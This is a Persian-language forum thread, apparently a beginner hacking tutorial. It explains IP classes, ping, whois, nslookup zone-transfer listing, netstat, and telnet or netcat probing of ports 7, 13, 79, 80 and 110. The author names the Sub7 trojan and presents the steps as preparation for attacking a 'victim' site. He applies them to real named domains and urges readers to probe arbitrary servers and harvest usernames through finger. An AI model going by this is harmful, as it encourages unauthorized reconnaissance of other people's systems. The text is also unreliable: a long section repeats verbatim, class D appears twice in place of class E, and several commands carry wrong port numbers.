ميشود که xxxهای آن بين1تا۱۲۶است.هر گاه پرارزشترين بيت IP آدرس صفر باشد , آدرس از كلاس A است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 127 شبكه ميباشد و ميتواند حدود 17000000 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس A شبكه هاي ستون فقرات اينترنتي هستند . ۲-قالب 32 بيتي كلاس B بصورت زير است : آدرس كاربر(16 بيت) آدرس شبكه(14بيت) 10 هر گاه پرارزشترين بيتهاي IP آدرس10 باشند , آدرس از كلاس B است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 16382 شبكه ميباشد . كه هر يك ميتواند 65534 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس B شبكه هاي عظيم اينترنتي هستند كه تمام اين آدرسها امروز تخصيص داده شده اند .اينIPها تمام xxxهايی را شامل ميشوند که عددشان بين128تا۱۹۱است و از کلاسهای پر کاربرد هستند. ۳-قالب 32 بيتي كلاس C بصورت زير است : آدرس كاربر(8 بيت) آدرس شبكه(21بيت) 110 در اين كلاس پرارزشترين بيتها 110 هستند . اين كلاس پر كاربردترين كلاس است . در اين كلاس با توجه به آدرس 21 بيتي شبكه , ميتوان حدود 2000000 شبكه تعريف كرد.و اين کلاس تمام IPهايی را شامل ميشود که xxxهای آنها بين192تا۲۲۳است. ۴-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . ۵-آدرسهاي كلاس D : قالب 32 بيتي كلاس D بصورت زير است : آدرس كاربر(28 بيت) 1110 در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند . خلاصه ای از مطالب بالا: اين هم خلاصه ی مطالب مهم که اگر حوصله خواندن اين کلاسهای IPمسخره را نداريد 1- كلاس A : عدد سمت چپ IP ادرسهاي كلاس A بين 0 تا 127 ميباشد . 2- كلاس B : عدد سمت چپ IP ادرسهاي كلاس B بين 128 تا 191 ميباشد . 3- كلاس C : عدد سمت چپ IP ادرسهاي كلاس C بين 192 تا 223 ميباشد . فعلا تا اینجا رو داشته باشید.
سلام خوب حالا فکر کنم مفهوم IPقشنگ براتون جاافتاده ميريم سر دستورها بدست آوردن IPيک سايت: در اولين قدم هک چه کلاينت و چه سرور بايد IPرو بدست بياوريم.که برای به دست آوردن IP يک سرور يا سايت ۲ روش وجود دارد البته نرم افزارهای زيادی در اين مورد هست که به موقعش معرفی ميکنم ۱-در CMDويندوزتان برويد و اين عبارتو تايپ کنيدping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]وبه/</A> جای domainآدرس اينترنتی سايت خودتونو بنويسيد مثلا در مورد سايت يك سايت قبلا امتحان کردم شده: ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> Pinging <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round trip times in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms بعد IPاين سايت [66.48.76.205]است.و يه سرس اطلا عات ديگه با همين دستوره کوچولو به دست اومد که بعدن سر موقعش همشو بهتون تو ضيح ميدم. روش دوم۲-همان Whoisکردن است که در اوايل صحبتهايم براتون تعريفش کردم اين راه به نظر شخصی من بهتر از PINGکردنه چون اطلاعات جامع تری رو ميده و يکی از همين سايتها که هر هکری بهش علاقه منده اينه برای ديدنش اينجارو کليک کنيد.و برای Whoisکردن اين عبارتو در اينترنت اکسپلولر تايپ ميکنيم و Enterميزنيم <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]که</A> به جای اين ضربدرها آدرس سايت مورد نظر خود را بنويسيد مثلا در مورد همون سايت اين ميشود <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> خيلی از شماها حتما فرق اين دو روش را فهميدين در روش Whoisاطلاعات ذيقيمتی رو بدست مياورين در اصل ميشه گفت اين روندها مثل زنجير بهم پيوستن خوب اطلاعاتی که گفتم همونDNS ServerياDomain Serverاست و به وسيله همين DNS Serverو با استفاده از دستور nslookupاطلاعات ذيقيمت تری رو بدست مياوريد. استفاده از دستور مهم nslookup وقتی DNS Serverيک سايتو بدست آورديم با استفاده از روش Whoisکردن که در بالا گفتم و اين آدرس هميشه در سطر آخر ديده ميشود و معمولا به اين شکل است در مورد همون سايت امتحان کردم شد s1.moaddabfurniture.com s2.moaddabfurniture.com خوب حالا شروع ميکنيم اين دستورو در CMDتايپ nslookup وEnterکنيد نتيجه به اين شکل است: *** Can't find server name for address 192.168.20.3: Non-exi... *** Can't find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: xxx.xxx.xx.x خوب حالا اين عبارتو تايپ ميکنيم server dns_serverو به جای dns_serverهمون DNS Serverاوليه را تايپ ميکنيم مثلا در مورد همون سايت ميشه server s1.moaddabfurniture.comاگه احيانا به پيام اخطار برخورد کرديد DNS Serverدوم را وارد کنيد فکر کنم متوجه شديد جريان از چه قراره اينبار شما وارد محيط nslookupشديد پس اينجا هم از دستور ها ی متفاوتی پيروی ميکنه که هرکدو اطلاعات خاص خودش ميده که الان من اين دستورها رو ميگم ولی شما از بعضی نتايجش ميتونين اطلاعات ذيقيميتی رو بدست آوريد. set type=any بعدش اينو تايپ کنيدls -d site_name و به جای siteاسم سايتتونو بنويسيد مثلا ls -d moaddabfurniture.com خوب اگه شماها تا حالا رو يه سايت کارای بالا رو کرده باشين دستتون پره به زبان عاميانه يعنی شما دارين خودتونو شارژ ميکنين برای حمله به سايت قربانی اگه موافق باشيد در بار بعد بريم سر بحث پورتها پس فعلا با اجازه
سلام مفهوم پورتها به طور کامل و مشخصات آن خوب اين بحث مهمترين کارمونه چون ميخوام پو رتها رو بشناسيم و به اونها تلنت کنيم چون تا وقتی که نفهميم کدوم پورت چه کاری انجام ميده نميتونيم موفق بشيم ۱- پورت‌های 0 تا 1023 : مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در قسمت های قبل آشنا شده‌ايد. ۲- پورت‌های 1024 تا 49151 : اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند. ۳- پورت‌های 49152 تا 65535 : اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) به کار میرود. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند. فکر کنم الان مفهوم پورت براتون جا افتاد و اما يه مطلب مهم: شما بايد با مدل TCP/IPآشنا باشيد اگه نيسيتيد ياد بگيريد اينم از مقدمات يه هکر شدنه در ضمن من ميخوام آموزشش بدم ميتونين نه کتاب بخرين نه پول آموزشگاه بدين پس آروم آروم من هم به سايت رونق ميدم اما من گفتم و بازم ميگم تايپ فارسی خوب نيست اگه يه شريک مشتی گير مياوردم مطالب بالا رو با هم کامل و دو نفری مشغول باشيم هم شماها بيشتر حال ميکردين هم ما به خدا به هرحال بايد با تنهايی ساخت ولی حتما اين TCP/IPرو ميگم اما گفتم زبان Cرو بريد بيرون ياد بگيريد من نميتونم اينطوری تو وبو بنويسم. پورتهای باز وبسته ی يک سرور را چگونه تشخيص دهيم معمولا اين کارها را نرم افزارها ميکنند نه خود کاربر يه توضيح کوچولو در مورد Whois اگر شما ميخواین Whois کنيد و از همان سايت samspadeاستفاده کنيد شايد جواب نده علتش رو بعدن ميگم اما برای اينکه یه کم بدونين به دليد مسایل دامين و جغرافيايی است پس از اين دستور استفاده کنيد مثلا آخر سايت شما .comداره اونوقت منظورمو ميگيرين اينم دستورش که در اينترنت اکسپلولر تو ضيح دادم . <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> و به جای ضربدر ها آدرس سايتو مينويسيد اينم مخصوص سايتهايی که آخرشون .irداره/[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] اينم مخصوص اونايی که آخرشون .twو.bizو.cc <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> و ميخوام در مورد سايت رشد ببينيم خوب اين آدرسشهRoshd.irو به جای xxxxxxهامنويسيم Roshdو به جایyyyyمينويسيم .irفکرکنم الان خوب متوجه شده باشيد. چند نکته مهم در مورد PINGو دستوراتش اگه يادتون باشه اون اولای مقاله به یه سایت Pingکرديم خوب حالا ميخوام اون نتايجی رو که گفتم بعدن بهتون ميگم رو الان بگم چون الان مفهموم هک و خيلی چيزارو يادگرفتين بريم تو کارش چشم دستورشم يه بار ميگم که مجبور نشی دو ساعت بری بالا بگردی دنبالش Ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> domain or your ip اينم نتيجش ping <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> Pinging <A href="[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]" target=_blank>[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]> [66.48.76.205] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 66.48.76.205: bytes=32 time=855ms TTL=106 Ping statistics for 66.48.76.205: Packets: Sent = 4, Received = 1, Lost = 3 (75% loss), Approximate round trip times in milli-seconds: Minimum = 855ms, Maximum = 855ms, Average = 855ms خوب اين داره ميگه که زمان رسدن به پکت رو ميگه خودتون ببينيد که به سرعت شما و ترافيک و خطوط شبکه بستگی داره البته من بعضی جاهاش حذف کردم اما عبارت جلوی Replyتايم رسيدن را نشان ميده و يه نکته مهم ديگه اينکه با توجه به سطر آخر ميفهميم lover-hackers.comفعال هست يا نه الان تو مثال بالا فعال است اما اگه عددهای جلوی عبارتهایMinimumوMaximumوAvreageصفر شود اونوقت يعنی فعال نيست. موفق باشيد
سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ip adress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnet alborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید
سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ip adress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnet alborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید

mazi_z_PSP
08-05-2007, 11:50
ترمينولوژی (اصطلاح‌شناسی) - Hacker کيست ؟ هکر کسی است که با سيستم های کامپيوتری آشناست و می‌تواند با روش‌هايی خاص (بدون اجازه) وارد آنها شود... اين انسان می‌تواند خوب يا بد باشد ( در هر حال هکر است) - سوال: يک هکر از چه راهی وارد يک سيستم می‌شود؟ از راه شبکه (نه بابا( ! بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی) bug خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف می‌شوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرم‌افزارهايی را به‌سرعت (در عرض چند ساعت ) ايجاد می‌کنند تا مشکل رفع شود اين‌ها را patch می‌گويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل می‌کنند. در اين فاصله هکرها دمار از روزگار اين سايت‌ها در می‌اورند... - تعريف چند اصطلاح: *** Hacker واقعی = سامورايی : کسی که هدفش از نفوذ به سيستم‌ها نشان دادن ضعف سيستم‌های کامپيوتری است نه سوءاستفاده ... *** Wacker واکر: کسی که هدفش از نفوذ به سيستم‌ها، استفاده از اطلاعات آن سيستم‌هاست)جرو هکر‌های کلاه‌ سياه ( *** Cracker کراکر: کسی که هدفش از نفوذ به سيستم‌ها، خرابکاری و ايجاد اختلال در سيستم‌های کامپيوتری است. (جرو هکر‌های کلاه‌ سياه( *** Preaker : از قديمي‌ترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراق‌سمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه تقسيم‌بندی - انواع کامپيوتر‌های شبکه: => کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايت‌ها را نگه می‌دارند. => کامپبوتر‌های Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار می‌کشيد. - انواع سيستم‌ عامل‌هايی که Server ها از آن استفاده‌ می‌کنند: => سيستم‌های فعلی: * خانواده Unixمثل( FreeBSD , Linux ) * خانواده Windows مثل( WinNT, Win2000 ) * Sun Solaris * OsMac => سيستم‌های قديمی (منقرض شده - آخيش ![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] AIX, IRIS, DEC10, DEC20 , ... - سوال: کدام‌ها را بايد ياد گرفت؟ Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد. Command Prompt چيست؟ در بسياری از درس‌های آينده از Command Prompt(خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روش‌های زير را به کار بريد: ۱- مسير زير را در ويندوز طی کنيد: Start > Programs > Accessories > Command Prompt ۲- در قسمت Run بنويسيد command يا cmd معرفی چند اصطلاح IP: شماره‌ ايست که به هر کامپيوتر متصل به اينترنت داده می‌شود تا بتوان به‌کمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايت‌ها) و نيز کامپيوتر‌های کلاينتی که معمولا به روشی غير از شماره‌گيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل می‌شويد، عددی جديد به شما نسبت داده می‌شود. اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی به‌صورت زير نوشته می‌شود: xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شماره‌ها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسم‌هايی مثل [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که برای اتصال استفاده می‌کنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد. در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح می‌دهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول می‌گيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار می‌تواند مفيد باشد. بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا می‌گم) پورت (Port): در ساده ترين تعريف، محلی است که داده‌ها وارد با خارج می‌شوند. در مبحث هک معمولا با پورت‌های نرم‌افزاری سروکار داريم که به هر کدام عددی نسبت می‌دهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورت‌ها کار خاصی را نسبت می‌دهند و بقيه به‌صورت پيش‌فرض برای استفاده شما هستند. پورت‌های که فعال هستند، هرکدام توسط يک نرم‌افزار خاص مديريت می‌شوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرم‌افزار اين کار انجام شود و اين نرم‌افزار بر روی پورت ۲۵ منتظر (فال‌گوش) می‌ماند. اينجا ممکن است شخصی از فلان نرم‌افزار و ديگری از بهمان نرم‌افزار استفاده کند ولی به‌هر حال پورت ۲۵ هميشه برای ارسال Email است. در پايين ليستی از مهمترين پورت‌ها و کاربردشان را می‌بينيد: Port Num Service Why its phun -------- ------- ---------------------------------------- 7 echo Host repearts what you type 9 discard Dev/null 11 systat Lots of info on users 13 daytime Time and date at computers location 15 netstat Tremendous info on networks 19 chargen Pours out a stream of ASCII characters. 21 ftp Transfers files 23 telnet Where you log in. 25 smpt Forge email 37 time Time 39 rlp Resource location 43 whois Info on hosts and networks 53 domain Nameserver 70 gopher Out-of-date info hunter 79 finger Lots of info on users 80 http Web server 110 pop Incoming email 119 nntp Usenet news groups -- forge posts, cancels 443 shttp Another web server 512 biff Mail notification 513 rlogin Remote login who Remote who and uptime 514 shell Remote command, no password used syslog Remote system logging 520 route Routing information protocol از ميان اين پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد. چگونه به يک پورت Telnet کنيم؟ برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد: telnet hostname portnum در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] مي‌نويسيد: telnet iums.ac.ir 13 telnet iums.ac.ir daytime هر دو اين دستورات معادل هم هستند. تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند. همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد تقسيم‌بندی انواع حملات اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی 